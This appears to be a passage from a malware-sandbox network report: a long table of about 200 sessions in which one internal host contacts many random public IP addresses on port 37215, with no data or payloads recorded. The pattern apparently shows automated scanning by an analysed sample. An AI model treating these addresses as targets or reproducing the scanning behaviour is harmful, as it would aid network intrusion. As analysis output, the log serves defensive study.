                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16619192.168.2.1349966197.136.154.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16620192.168.2.1346432197.170.63.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16621192.168.2.1339064197.172.202.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16622192.168.2.1338152157.0.108.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16623192.168.2.1341324157.48.243.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16624192.168.2.1334374157.22.41.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16625192.168.2.1340814197.70.5.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16626192.168.2.135324441.171.121.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16627192.168.2.1335564157.131.172.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16628192.168.2.1334344147.118.150.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16629192.168.2.134859441.1.63.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16630192.168.2.133311441.88.42.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16631192.168.2.1335508157.14.106.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16632192.168.2.134535447.120.121.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16633192.168.2.133879041.247.246.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16634192.168.2.134123841.204.87.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16635192.168.2.1348352157.157.168.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16636192.168.2.133504641.254.59.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16637192.168.2.134562841.56.170.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16638192.168.2.133864041.223.210.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16639192.168.2.1340326197.227.181.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16640192.168.2.1355634197.144.110.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16641192.168.2.1343288205.137.231.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16642192.168.2.133742441.169.18.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16643192.168.2.13601521.196.4.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16644192.168.2.135235641.206.20.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16645192.168.2.134214841.202.45.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16646192.168.2.134228641.237.129.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16647192.168.2.1335762157.239.143.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16648192.168.2.1353364157.143.204.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16649192.168.2.1338702157.128.172.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16650192.168.2.133420641.217.211.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16651192.168.2.1340984157.46.52.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16652192.168.2.1357924138.178.202.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16653192.168.2.1342686197.49.202.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16654192.168.2.1346212197.0.48.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16655192.168.2.1352506124.86.231.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16656192.168.2.1358800157.205.145.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16657192.168.2.134666241.71.188.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16658192.168.2.1351368197.182.47.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16659192.168.2.1352058145.77.73.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16660192.168.2.1360056159.60.238.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16661192.168.2.1358392178.145.241.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16662192.168.2.133834641.215.29.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16663192.168.2.1336724186.235.78.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16664192.168.2.1353942157.14.223.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16665192.168.2.135548641.1.23.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16666192.168.2.1360554102.172.170.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16667192.168.2.135087041.189.130.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16668192.168.2.1335408157.166.234.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16669192.168.2.1348036157.206.88.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16670192.168.2.134305841.160.6.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16671192.168.2.133822461.208.165.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16672192.168.2.133352441.99.218.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16673192.168.2.1338160197.94.127.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16674192.168.2.136036441.25.221.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16675192.168.2.1334750197.94.224.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16676192.168.2.135308641.144.98.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16677192.168.2.1353736157.100.16.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16678192.168.2.1345144157.88.229.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16679192.168.2.1356986157.168.13.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16680192.168.2.1336594157.147.180.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16681192.168.2.1333782180.19.153.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16682192.168.2.1345598123.114.206.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16683192.168.2.1350808197.74.138.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16684192.168.2.134787441.172.37.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16685192.168.2.1342254117.44.78.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16686192.168.2.1340814157.125.255.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16687192.168.2.1333536158.180.72.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16688192.168.2.1336792212.206.215.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16689192.168.2.134287241.166.38.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16690192.168.2.1360700157.188.70.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16691192.168.2.134147841.19.167.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16692192.168.2.1342664157.42.68.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16693192.168.2.1341236157.27.147.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16694192.168.2.1333556157.237.117.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16695192.168.2.1354542157.39.180.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16696192.168.2.1338672197.166.218.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16697192.168.2.1337716197.176.123.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16698192.168.2.135986841.51.187.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16699192.168.2.1341700157.104.15.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16700192.168.2.1351244157.201.239.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16701192.168.2.1354234197.85.172.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16702192.168.2.133582653.182.235.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16703192.168.2.1353164197.156.241.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16704192.168.2.1344602197.191.233.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16705192.168.2.135579641.145.150.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16706192.168.2.1360846157.134.32.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16707192.168.2.1351068157.71.16.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16708192.168.2.135939241.0.227.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16709192.168.2.134439441.77.125.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16710192.168.2.1356878157.22.83.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16711192.168.2.1347714157.103.69.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16712192.168.2.1334882197.57.159.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16713192.168.2.1345782197.218.198.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16714192.168.2.133937441.44.131.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16715192.168.2.133442441.171.219.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16716192.168.2.1360558157.237.255.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16717192.168.2.13399785.94.71.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16718192.168.2.1350300197.126.184.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16719192.168.2.133791441.50.13.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16720192.168.2.1338878157.251.42.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16721192.168.2.134436449.112.181.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16722192.168.2.1339036115.225.71.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16723192.168.2.134712288.35.172.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16724192.168.2.1360072197.92.55.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16725192.168.2.1357316197.245.7.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16726192.168.2.1335000197.75.28.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16727192.168.2.135044441.206.12.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16728192.168.2.1336642157.129.30.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16729192.168.2.1349916197.80.193.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16730192.168.2.1335530157.115.33.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16731192.168.2.13384068.118.51.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16732192.168.2.1336856157.134.189.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16733192.168.2.1358068186.204.6.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16734192.168.2.136044841.120.37.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16735192.168.2.1348540197.98.179.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16736192.168.2.1342390197.150.71.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16737192.168.2.1349084157.175.20.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16738192.168.2.1358652197.154.150.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16739192.168.2.1343384157.157.229.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16740192.168.2.1357562157.190.134.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16741192.168.2.134829041.186.189.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16742192.168.2.133454041.140.113.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16743192.168.2.135610441.56.14.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16744192.168.2.1352760197.68.78.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16745192.168.2.1351040223.91.197.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16746192.168.2.1342168157.172.82.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16747192.168.2.134778041.123.90.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16748192.168.2.135804438.54.154.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16749192.168.2.1347740197.137.66.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16750192.168.2.134303841.237.219.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16751192.168.2.133588641.116.249.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16752192.168.2.1355802157.197.195.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16753192.168.2.136068241.102.0.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16754192.168.2.1350274211.54.97.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16755192.168.2.134520841.157.34.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16756192.168.2.1354076157.40.52.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16757192.168.2.1358808157.124.167.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16758192.168.2.1334826197.130.159.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16759192.168.2.1339290185.85.97.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16760192.168.2.1339030197.91.219.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16761192.168.2.1358630177.179.198.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16762192.168.2.133609041.119.254.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16763192.168.2.135528441.27.94.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16764192.168.2.1337084157.28.29.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16765192.168.2.1357672155.8.195.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16766192.168.2.1335646157.144.116.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16767192.168.2.1353118104.107.116.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16768192.168.2.1341534197.53.197.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16769192.168.2.135480841.100.249.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16770192.168.2.134294041.194.201.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16771192.168.2.133576281.122.201.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16772192.168.2.134904892.18.159.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16773192.168.2.1346850157.78.38.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16774192.168.2.1348188197.32.69.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16775192.168.2.133394641.242.208.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16776192.168.2.135509441.34.251.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16777192.168.2.1342724194.109.195.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16778192.168.2.1355038197.8.0.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16779192.168.2.1353690197.44.119.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16780192.168.2.135157241.158.224.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16781192.168.2.134827850.29.149.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16782192.168.2.1354256112.128.185.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16783192.168.2.1345608157.192.228.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16784192.168.2.1339172118.14.228.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16785192.168.2.1353204192.104.59.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16786192.168.2.1347248197.155.207.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16787192.168.2.1340562206.36.46.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16788192.168.2.1346948161.153.124.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16789192.168.2.1343278197.208.204.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16790192.168.2.135916641.134.55.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16791192.168.2.1357832157.110.28.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16792192.168.2.1360526157.97.117.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16793192.168.2.13491248.114.132.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16794192.168.2.133906641.16.40.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16795192.168.2.1350238211.160.87.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16796192.168.2.133585641.84.150.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16797192.168.2.135387041.126.43.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16798192.168.2.133350841.4.127.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16799192.168.2.134234641.51.126.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16800192.168.2.135207097.65.50.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16801192.168.2.1332960157.244.246.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16802192.168.2.1336800157.126.134.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16803192.168.2.13453064.12.15.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16804192.168.2.1339856197.49.225.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16805192.168.2.1333164197.32.3.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16806192.168.2.1333574157.93.113.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16807192.168.2.1350142157.167.131.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16808192.168.2.135153841.53.116.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16809192.168.2.1341688197.14.98.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16810192.168.2.1336440157.209.223.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16811192.168.2.1335554197.215.118.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16812192.168.2.134026441.102.132.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16813192.168.2.1360954197.9.5.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16814192.168.2.134941037.210.129.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16815192.168.2.1338924197.189.27.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16816192.168.2.135813241.232.216.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16817192.168.2.1359102197.152.123.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16818192.168.2.1358272157.214.43.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16819192.168.2.1356282197.175.187.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16820192.168.2.1334370162.75.102.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16821192.168.2.1332860197.169.24.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16822192.168.2.1360206157.226.241.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16823192.168.2.134835068.200.176.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16824192.168.2.1342944157.251.116.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16825192.168.2.1335514197.225.170.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16826192.168.2.1346024197.80.84.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16827192.168.2.1347156157.167.213.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
